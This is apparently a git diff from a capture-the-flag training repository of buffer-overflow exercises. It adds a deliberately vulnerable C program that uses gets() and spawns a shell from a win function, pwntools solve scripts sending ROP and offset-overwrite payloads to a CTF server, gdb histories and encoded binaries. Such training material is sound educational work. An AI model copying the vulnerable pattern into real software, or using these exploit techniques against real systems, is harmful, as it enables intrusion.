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

literal 0
HcmV?d00001

diff --git a/BOF/03_tiny_escape_room/main.c b/BOF/03_tiny_escape_room/main.c
new file mode 100644
index 0000000..fcf3c26
--- /dev/null
+++ b/BOF/03_tiny_escape_room/main.c
@@ -0,0 +1,37 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void setup() {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void win(int arg1, int arg2) {
+    if (arg1 == 0xdeadbeef && arg2 == 0xcafebabe) {
+        puts("Door unlocked!");
+        system("/bin/sh");
+    } else {
+        printf("Wrong keys: 0x%x, 0x%x\n", arg1, arg2);
+    }
+}
+
+void gadgets() {
+    __asm__("pop %rdi; ret");
+    __asm__("pop %rsi; ret");
+}
+
+void vuln() {
+    char buffer[64];
+    puts("Welcome to the tiny escape room!");
+    puts("Two magic keys open the door.");
+    puts("keys?");
+    gets(buffer);
+}
+
+int main() {
+    setup();
+    vuln();
+    return 0;
+}
diff --git a/BOF/03_tiny_escape_room/solve.py b/BOF/03_tiny_escape_room/solve.py
new file mode 100644
index 0000000..4e7f5bf
--- /dev/null
+++ b/BOF/03_tiny_escape_room/solve.py
@@ -0,0 +1,33 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("./escape_room", checksec=False)
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13566)
+# p.recvuntil(b"keys?\n")
+# Your exploit here
+
+var1 = 0xDEADBEEF
+var2 = 0xCAFEBABE
+OFFSET = 72
+# Gadget to overwrite rdi e rsi (pop)
+# (Creati in main.c)
+rdi = 0x401287
+rsi = 0x401289
+ret = 0x40101A
+# win addr
+win = 0x40121B
+payload = flat(
+    b"A" * OFFSET,
+    p64(rsi),
+    p64(var2),
+    p64(rdi),
+    p64(var1),
+    p64(ret),
+    p64(win),
+)
+p.send(payload)
+# p.send(b'cat flag\n')
+# p.recv()
+p.interactive()
diff --git a/BOF/04_lemonade_stand/.gdb_history b/BOF/04_lemonade_stand/.gdb_history
new file mode 100644
index 0000000..832b898
--- /dev/null
+++ b/BOF/04_lemonade_stand/.gdb_history
@@ -0,0 +1,53 @@
+disass vuln
+b *0x00000000000012a7
+run
+n
+n
+n
+n
+n
+n
+c
+v
+c
+quit
+run
+disass main
+b *+23
+disass main
+breaj +23
+break +23
+info breakpoint
+info breakpoints
+clear breakpoints
+layout asm
+b <main+23>
+b main
+c
+r
+b +23
+b main+23
+b *(main+23)
+c
+ni
+ni
+c
+quit
+disass main
+quit
+disass main
+disass vuln
+b *0x00000000000012a2
+r
+b +5
+quit
+disass vuln
+b *0x00000000000012a2
+r
+quit
+quit
+run
+quit
+r
+disass vuln
+quit
diff --git a/BOF/04_lemonade_stand/lemonade_stand b/BOF/04_lemonade_stand/lemonade_stand
new file mode 100755
index 0000000000000000000000000000000000000000..6d06f47dfcc3420b1c2285b9f3eaa76a15047ba3
GIT binary patch
literal 19312
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

literal 0
HcmV?d00001

diff --git a/BOF/04_lemonade_stand/solve.py b/BOF/04_lemonade_stand/solve.py
new file mode 100644
index 0000000..d7cd67e
--- /dev/null
+++ b/BOF/04_lemonade_stand/solve.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("./lemonade_stand", checksec=False)
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13562)
+# Your exploit here
+# mov eax, DWORD_PTR[rbp-0x4] overwrite eax value
+OFFSET = 76
+leet = 0x1337
+payload = flat(b"A" * OFFSET, p64(leet))
+p.send(payload)
+# p.send(b'cat flag\n')
+# p.recv()
+p.interactive()
diff --git a/BOF/05_mini_game_arena/.gdb_history b/BOF/05_mini_game_arena/.gdb_history
new file mode 100644
index 0000000..a9cdbf3
--- /dev/null
+++ b/BOF/05_mini_game_arena/.gdb_history
@@ -0,0 +1,3 @@
+r
+:q
+quit
diff --git a/BOF/05_mini_game_arena/mini_game b/BOF/05_mini_game_arena/mini_game
new file mode 100755
index 0000000000000000000000000000000000000000..2f051d32fa65e02e5330c0b914af5ad493109562
GIT binary patch
literal 19312
zcmeHPeQ+Dcb>9OB5){8cQXixgmnTc|M;Zd8L`#%xNhgVvL06v^)yS=-69^m#*dTxa
z2kN7arB;br)l!F^CW<?88aM4Ep2@V)IGNO~J+V`1?6{M*vg)?ZO#e_aRx6DYS4rHC
z8jp?s-tImCJd^26JCi>$SPt&Jeed_)?!Mi--TPRc7~QemXBdK$PizvDyAZOZNF9Y3
z*ebJHHZ0nNC02=*q7jk?{4A*<syL=^`jmocP~-fdWY<HCq}D9@5t$Q$Dc6uF*;SLJ
zSw&A$g^-wvkjj%?fLNUux_wOlN!ODp<0|EuWQ=55k}z%1c1&ySs4BPm75vslWyf?_
z+a1-E?I=rj!LYImZc=tkFY7=s<#<v|=r^q6IqX+<Ob4K&#MEn-(sn6r$8<!Q38qvA
zrG3}j#Q&wdJ=*T9Dcy*(rX?As<4P=;a(R1Ur@K}oem>!Deo&V;Uq1wO{F&<Tiby6s
zv34kuN%UvZ+0xPeqr+?a*A9h?x$tUPFxAV%kH*yfyY>sXd6{H7jKX(P<=G$U7HU1=
zzn?wu-;LM5cf9)>sg1{H7XADA8~wwCp?Z@IVJMM5UBybi2^?W$JPcEuG(tX-ai89O
z+u4sK_s2r(fAR#MKG4oiw<Fs%TO@NG^T?_0bKy&noA`MX)o(8Rz4OSILEb5r3d^#<
zRol`Gp5%Kx@*yoh?2(J2<4#YMlA`D)(pix&xkXVtR&<>ylH^LRux)g0+%CGYf@@F3
z0D{6P6re~KbMf`-?P5HZO$tI$f3Fqy?-<*<&0ZZ|SK(HN@2T)>hG024mCI_EHfrWW
zzxmNeew>rUDgFUycw8<?r`za^rEyNO($X}V>KBJ}{u@u8NB8=~Bgj*FbF(EW^*P0s
z)72U|jUP@NM;f0rHaKw{NzUVibR0*LQ_L$#$CrHgDni)S$a&0@I#eSkUz~bs<Z|4y
zqE71(s7Ih4fqDe$5vWI?9)WrUexVWgX~(bpEPCpP!RQl#*CRqiKmD@nD_@SDx)i)9
z>ruYvZy_$P`Yw(geU>16iZnNVP%f8~Gcr#L(i>N*d0Hsm_?v2;7Kk^VtK`e8PQzQW
zqi;k=f8|w=d-Btse0ElT@JC~3UOyB)^MmNAw{GqkA02#o@U`fxul{M5CCZEZfWDgy
zcl3P<g)09StJ#_72e1&0Zlt5z{X8M4$;~g3pnNqsb1_*3Q+vN9@xT3!Bxi0$zx~eU
